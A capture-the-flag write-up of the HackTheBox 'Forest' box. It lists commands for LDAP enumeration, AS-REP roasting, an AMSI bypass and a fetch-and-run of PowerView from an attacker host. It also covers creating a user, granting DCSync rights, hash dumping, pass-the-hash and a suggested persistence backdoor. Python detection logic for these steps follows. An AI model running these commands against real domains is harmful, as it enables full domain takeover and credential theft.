hackthebox-forest-202

hackthebox forest

forest

port scan

A rustscan sweep shows the open ports, including 389 (LDAP), 139 and 445 (SMB).

services

Enumerate the LDAP service with windapsearch:

```bash
# Retrieve every object
windapsearch --dc '10.10.10.161' -u '' -p '' --full -m custom --filter "(&(objectclass=*))" | tee custom.allobj.txt

# Retrieve user objects
mod="users"; windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"

# Retrieve group objects
mod="groups"; windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"

# Retrieve computer objects
mod="computers"; windapsearch --dc '10.10.10.161' -u '' -p '' --full -m "${mod}" | tee "${mod}.txt"
```


Filter the sAMAccountName values out of the enumeration output to get a list of user names:

```bash
cat users.txt | rg -iaoP "(?<=samaccountname:\s).+$" | sort | uniq | sort | rg -ivP "((healthmailbox)|(defaultaccount)|(331000)|(sm_.+))" | tee ../0817-forest.htb.local.users.txt
```


Enumerate LDAP again with the impacket-GetADUsers script:

```bash
impacket-GetADUsers -all -no-pass -dc-ip '10.10.10.161' 'htb.local/' | tee ../0817-getADUsers.impacket.txt
```

Filter the GetADUsers output down to user names:

```bash
cat ../0817-getADUsers.impacket.txt | tail -n+6 | awk '{print $1}' | rg -ivP "((guest)|(331000)|(krbtgt)|(sm_.+$)|(healthmailbox)|(defaultaccount))" | tee ../0817-getADUsers.impacket.username.txt
```


Merge both user-name lists and use impacket-GetNPUsers to request AS-REP hashes for accounts that do not require Kerberos pre-authentication:

```bash
# Merge and de-duplicate the two user-name lists (the output file name must match the -usersfile below)
cat 0817-getADUsers.impacket.username.txt 0817-forest.htb.local.users.txt | sort | uniq | sort | tee 0817.forest.htb.username.lst

impacket-GetNPUsers -dc-ip '10.10.10.161' -no-pass -usersfile './0817.forest.htb.username.lst' -outputfile '0817-htb.local.GetNpUsers.txt' 'htb.local/'
```


Crack the AS-REP of the svc-alfresco user with john:

```bash
# john-Rockyou is the author's wrapper (presumably john with the rockyou wordlist)
john-Rockyou ./0817-htb.local.GetNpUsers.txt
```


This yields the credentials svc-alfresco / s3rvice.

foothold

Log in with evil-winrm using the recovered svc-alfresco / s3rvice credentials; the login succeeds.

```bash
evil-winrm -i '10.10.10.161' -u 'svc-alfresco' -p 's3rvice'

*Evil-WinRM* PS> whoami ; hostname ; type user.txt ; ipconfig /all
```


priv esc

Enumerating from the svc-alfresco interactive shell shows that svc-alfresco is a member of the Account Operators group, which opens a path to a DCSync attack.

```powershell
# Bypass AMSI inside evil-winrm
Bypass-4MSI

# Import the PowerView module
iex(New-Object Net.WebClient).downloadString('http://10.10.14.22/0-bin/PowerView.ps1')
```


DCSync attack steps: Account Operators -> Exchange Windows Permissions -> DCSync

```powershell
# Add a domain user gvest and put it in the relevant groups
net user gvest p@ssw3rd135246 /add /domain
net group "Exchange Windows Permissions" gvest /add
net localgroup "Remote Management Users" gvest /add
```


```powershell
# Grant DCSync rights to the newly added gvest user
$pass = ConvertTo-SecureString 'p@ssw3rd135246' -AsPlain -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\gvest', $pass)
Add-ObjectACL -PrincipalIdentity gvest -Credential $cred -Rights DCSync
```


Dump the domain hashes with impacket-secretsdump as the newly added gvest user:

```bash
impacket-secretsdump -outputfile '0817-forest.htb.local' -dc-ip '10.10.10.161' -target-ip '10.10.10.161' 'htb.local/gvest:p@ssw3rd135246@10.10.10.161'
```


Log in with evil-winrm using the Administrator NT hash (pass the hash):

```bash
evil-winrm -i '10.10.10.161' -u 'administrator' -H '32693XXXXXXXXeea6'
```

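From the defender's side, both techniques in this write-up leave distinct traces in the Windows Security log: the AS-REP roast shows up as a 4768 TGT request with pre-authentication type 0, and the DCSync as a 4662 directory access exercising the replication control-access rights from an ordinary user rather than a domain controller account. The following detection logic is an added example, not part of the original write-up; the events it scans are constructed (the field names follow the Security log schema, the account names mirror the ones above).

```python
import json
from typing import Optional

# Control-access-right GUIDs that a DCSync needs on the domain object.
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def classify(ev: dict) -> Optional[str]:
    """Return a finding label for one Security event, or None if it looks benign."""
    eid = ev.get("EventID")
    if eid == 4768:
        # Kerberos TGT request. PreAuthType "0" means no pre-authentication was
        # performed, which is exactly what GetNPUsers relies on; Status 0x0 means
        # the KDC actually issued the ticket (and thus the crackable AS-REP).
        if ev.get("PreAuthType") == "0" and ev.get("Status") == "0x0":
            return f"asrep-roast-candidate:{ev.get('TargetUserName')}"
    elif eid == 4662:
        # Directory service access. Replication rights exercised by anything other
        # than a computer account (name ending in "$") is DCSync-like behaviour.
        props = {p.lower() for p in ev.get("Properties", [])}
        subject = ev.get("SubjectUserName", "")
        if props & DCSYNC_RIGHTS and not subject.endswith("$"):
            return f"dcsync-like:{subject}"
    return None


def scan(lines) -> list:
    """Run classify() over JSON-encoded events and return the findings in order."""
    return [f for f in (classify(json.loads(l)) for l in lines if l.strip()) if f]


# Constructed sample events: one roastable account, one normal logon,
# one DCSync by a freshly created user, one legitimate DC replication.
SAMPLE_EVENTS = [
    '{"EventID":4768,"TargetUserName":"svc-alfresco","PreAuthType":"0","Status":"0x0","TicketEncryptionType":"0x17"}',
    '{"EventID":4768,"TargetUserName":"jdoe","PreAuthType":"2","Status":"0x0","TicketEncryptionType":"0x12"}',
    '{"EventID":4662,"SubjectUserName":"gvest","Properties":["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]}',
    '{"EventID":4662,"SubjectUserName":"FOREST$","Properties":["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The same logic also covers the account created in the escalation step: pairing it with event 4720 (user created) and 4728 (member added to a security-enabled global group such as Exchange Windows Permissions) gives the full chain.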

post

With every hash already dumped via impacket-secretsdump, a backdoor domain-admin user could also be added for persistence.

Author

cSan

Published

2023-08-17

Updated

2023-08-17

License